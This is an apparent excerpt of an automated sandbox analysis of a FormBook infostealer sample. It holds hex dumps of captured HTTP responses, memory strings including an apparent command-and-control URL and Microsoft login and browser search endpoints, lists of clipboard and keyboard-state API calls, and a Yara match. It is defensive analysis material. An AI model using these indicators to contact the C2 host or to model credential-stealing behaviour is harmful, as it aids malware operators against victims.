61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Fri, 10 Jan 2025 19:11:09 GMTContent-Type: text/htmlContent-Length: 548Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Fri, 10 Jan 2025 19:11:12 GMTContent-Type: text/htmlContent-Length: 548Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Fri, 10 Jan 2025 19:11:14 GMTContent-Type: text/htmlContent-Length: 548Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginxDate: Fri, 10 Jan 2025 19:11:34 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: close
                Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginxDate: Fri, 10 Jan 2025 19:11:37 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: close
                Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginxDate: Fri, 10 Jan 2025 19:11:39 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 32 32 34 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 0d 0a 30 0d 0a 0d 0a Data Ascii: 224<html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->0
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not Foundcontent-type: text/htmldate: Fri, 10 Jan 2025 19:11:47 GMTtransfer-encoding: chunkedconnection: closeData Raw: 31 31 46 41 0d 0a 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 22 20 6c 61 6e 67 3d 22 22 3e 0a 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 78 2d 75 61 2d 63 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 69 65 3d 65 64 67 65 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 57 65 62 73 69 74 65 20 6e 6f 74 20 66 6f 75 6e 64 e2 80 a6 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 3e 0a 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 70 6e 67 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 70 6e 67 3b 62 61 73 65 36 34 2c 69 56 42 4f 52 77 30 4b 47 67 6f 41 41 41 41 4e 53 55 68 45 55 67 41 41 41 45 41 41 41 41 42 41 43 41 59 41 41 41 43 71 61 58 48 65 41 41 41 41 41 58 4e 53 52 30 49 41 72 73 34 63 36 51 41 41 43 48 68 4a 52 45 46 55 65 41 48 64 57 32 6c 73 48 45 55 57 72 71 71 5a 73 54 33 6a 32 46 6d 62 48 42 78 42 58 73 79 47 73 41 73 43 43 52 49 52 67 6a 69 63 41 32 4a 48 52 41 74 45 51 74 48 43 6a 32 69 31 69 68 41 53 67 6e 43 45 4f 46 6e 45 6a 39 6a 68 4e 41 67 70 49 43 37 78 41 36 52 6f 45 59 65 49 69 42 30 57 45 67 64 4c 69 59 53 53 72 41 54 69 32 4a 42 73 49 42 41 4d 50 6d 49 6e 64 6a 7a 6a 65 44 78 56 2b 37 33 78 74 4e 55 7a 37 75 6e 70 71 75 6b 5a 6a 2b 67 66 72 75 70 36 72 39 37 33 76 61 2b 72 71 32 71 36 32 35 77 56 2b 4c 6a 77 30 4b 75 52 6f 64 35 54 69 35 52 53 53 78 52 6e 69 78 52 6a 63 7a 68 6a 4e 59 43 74 55 55 78 52 79 54 6a 6a 67 79 67 47 59 52 75 45 72 5a 63 72 64 70 42 7a 66 71 42 36 7a 6e 6b 48 75 78 65 75 6a 35 4a 50 6f 51 37 67 2b 58 39 63 65 2b 6a 56 30 48 2f 37 42 74 5a 49 4a 65 39 6e 54 46 33 48 46 41 73 61 6f 58 41 32 44 6e 6d 2b 45 46 78 73 76 33 78 32 37 58 75 48 46 36 36 50 47 38 56 78 36 65 53 72 41 48 2f 73 66 4b 75 69 4c 39 72 39 45 4b 37 6b 2f 62 69 36 46 37 6e 67 61 70 73 77 53 6e 34 42 32 65 30 58 38 4b 71 32 59 30 30 50 6e 4e 4d 4f 6b 4b 57 44 62 77 4a 55 64 54 79 39 49 43 48 6a 2f 30 4c 79 56 32 66 42 38 71 55 5a 68 4c 38 4d 69 4e 44 64 77 34 30 62 6a 2f 67 52 55 50 67 52 70 4c 4a 39 32 39 2f 47 31 66 6a 68 51 69 64 50 58 41 6d 44 73 41 6a 54 44 2b 35 35 6a 34 42 49 52 2b 74 71 4a 65 57 48 49 4f 4f 4c 6d 42 70 4a 53 53 37 45 48 64 48 47 35 70 30 61 66 61 61 34 35 69 56 41 5a 55 66 4c 56 56 4b 70 2f 62 67 73 4d 36 5a 45 4c 6b 59 44 5a 32 63 46 35 7a 65 4d 4e 4
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not Foundcontent-type: text/htmldate: Fri, 10 Jan 2025 19:11:51 GMTtransfer-encoding: chunkedconnection: closeData Raw: 32 30 30 0d 0a 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 22 20 6c 61 6e 67 3d 22 22 3e 0a 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 78 2d 75 61 2d 63 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 69 65 3d 65 64 67 65 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 57 65 62 73 69 74 65 20 6e 6f 74 20 66 6f 75 6e 64 e2 80 a6 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 3e 0a 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 70 6e 67 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 70 6e 67 3b 62 61 73 65 36 34 2c 69 56 42 4f 52 77 30 4b 47 67 6f 41 41 41 41 4e 53 55 68 45 55 67 41 41 41 45 41 41 41 41 42 41 43 41 59 41 41 41 43 71 61 58 48 65 41 41 41 41 41 58 4e 53 52 30 49 41 72 73 34 63 36 51 41 41 43 48 68 4a 52 45 46 55 65 41 48 64 57 32 6c 73 48 45 55 57 72 71 71 5a 73 54 33 6a 32 46 6d 62 48 42 78 42 58 73 79 47 73 41 73 43 43 52 49 52 67 6a 69 63 41 32 4a 48 52 41 74 45 51 74 48 43 6a 32 69 31 69 68 41 0d 0a 33 31 45 41 0d 0a 53 67 6e 43 45 4f 46 6e 45 6a 39 6a 68 4e 41 67 70 49 43 37 78 41 36 52 6f 45 59 65 49 69 42 30 57 45 67 64 4c 69 59 53 53 72 41 54 69 32 4a 42 73 49 42 41 4d 50 6d 49 6e 64 6a 7a 6a 65 44 78 56 2b 37 33 78 74 4e 55 7a 37 75 6e 70 71 75 6b 5a 6a 2b 67 66 72 75 70 36 72 39 37 33 76 61 2b 72 71 32 71 36 32 35 77 56 2b 4c 6a 77 30 4b 75 52 6f 64 35 54 69 35 52 53 53 78 52 6e 69 78 52 6a 63 7a 68 6a 4e 59 43 74 55 55 78 52 79 54 6a 6a 67 79 67 47 59 52 75 45 72 5a 63 72 64 70 42 7a 66 71 42 36 7a 6e 6b 48 75 78 65 75 6a 35 4a 50 6f 51 37 67 2b 58 39 63 65 2b 6a 56 30 48 2f 37 42 74 5a 49 4a 65 39 6e 54 46 33 48 46 41 73 61 6f 58 41 32 44 6e 6d 2b 45 46 78 73 76 33 78 32 37 58 75 48 46 36 36 50 47 38 56 78 36 65 53 72 41 48 2f 73 66 4b 75 69 4c 39 72 39 45 4b 37 6b 2f 62 69 36 46 37 6e 67 61 70 73 77 53 6e 34 42 32 65 30 58 38 4b 71 32 59 30 30 50 6e 4e 4d 4f 6b 4b 57 44 62 77 4a 55 64 54 79 39 49 43 48 6a 2f 30 4c 79 56 32 66 42 38 71 55 5a 68 4c 38 4d 69 4e 44 64 77 34 30 62 6a 2f 67 52 55 50 67 52 70 4c 4a 39 32 39 2f 47 31 66 6a 68 51 69 64 50 58 41 6d 44 73 41 6a 54 44 2b 35 35 6a 34 42 49 52 2b 74 71 4a 65 57 48 49 4f 4f 4c 6d 42 70 4a 53 53 37 45 48 64 48 47 35 70 30 61 66 61 61 34 35 69 56 41 5a 55 66 4c 56 56 4b 70 2f 62 67 73 4d 36 5a 45 4c 6b 59 44 5a 32 6
                Source: ycBMGRFRlht.exe, 00000008.00000002.2615837301.000000000570B000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.oneeyetrousersnake.xyz
                Source: ycBMGRFRlht.exe, 00000008.00000002.2615837301.000000000570B000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.oneeyetrousersnake.xyz/4inx/
                Source: powercfg.exe, 00000005.00000002.2616496531.0000000007D3B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                Source: powercfg.exe, 00000005.00000002.2616496531.0000000007D3B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                Source: powercfg.exe, 00000005.00000002.2616496531.0000000007D3B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
                Source: powercfg.exe, 00000005.00000002.2616496531.0000000007D3B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                Source: powercfg.exe, 00000005.00000002.2616496531.0000000007D3B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
                Source: powercfg.exe, 00000005.00000002.2616496531.0000000007D3B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
                Source: powercfg.exe, 00000005.00000002.2616496531.0000000007D3B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                Source: powercfg.exe, 00000005.00000002.2614313409.000000000417A000.00000004.10000000.00040000.00000000.sdmp, powercfg.exe, 00000005.00000002.2616328430.00000000062F0000.00000004.00000800.00020000.00000000.sdmp, ycBMGRFRlht.exe, 00000008.00000002.2613874662.0000000003ABA000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://joker.com/?pk_campaign=Parking&pk_kwd=text
                Source: powercfg.exe, 00000005.00000002.2616328430.00000000062F0000.00000004.00000800.00020000.00000000.sdmp, powercfg.exe, 00000005.00000002.2614313409.0000000003FE8000.00000004.10000000.00040000.00000000.sdmp, ycBMGRFRlht.exe, 00000008.00000002.2613874662.0000000003928000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://kb.fastpanel.direct/troubleshoot/
                Source: powercfg.exe, 00000005.00000002.2611913316.0000000002E4D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
                Source: powercfg.exe, 00000005.00000002.2611913316.0000000002E78000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
                Source: powercfg.exe, 00000005.00000003.2074271825.0000000007D16000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srfhttps://login.live.com/oauth20_desktop.srfhttps://login.
                Source: powercfg.exe, 00000005.00000002.2611913316.0000000002E4D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
                Source: powercfg.exe, 00000005.00000002.2611913316.0000000002E4D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033R
                Source: powercfg.exe, 00000005.00000002.2611913316.0000000002E4D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
                Source: powercfg.exe, 00000005.00000002.2611913316.0000000002E78000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
                Source: powercfg.exe, 00000005.00000002.2616496531.0000000007D3B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
                Source: C:\Users\user\Desktop\wWXR5js3k2.exeCode function: 0_2_006C4164 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,0_2_006C4164
                Source: C:\Users\user\Desktop\wWXR5js3k2.exeCode function: 0_2_006C4164 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,0_2_006C4164
                Source: C:\Users\user\Desktop\wWXR5js3k2.exeCode function: 0_2_006C3F66 OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,0_2_006C3F66
                Source: C:\Users\user\Desktop\wWXR5js3k2.exeCode function: 0_2_006B001C GetKeyboardState,SetKeyboardState,GetAsyncKeyState,GetAsyncKeyState,GetKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,0_2_006B001C
                Source: C:\Users\user\Desktop\wWXR5js3k2.exeCode function: 0_2_006DCABC DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,0_2_006DCABC

                E-Banking Fraud

                barindex
                Yara detected FormBook
                Source: Yara matchFile source: 2.2.svchost.exe.2600000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 2.2.svchost.exe.2600000.0.unpack, type: UNPACKEDPE
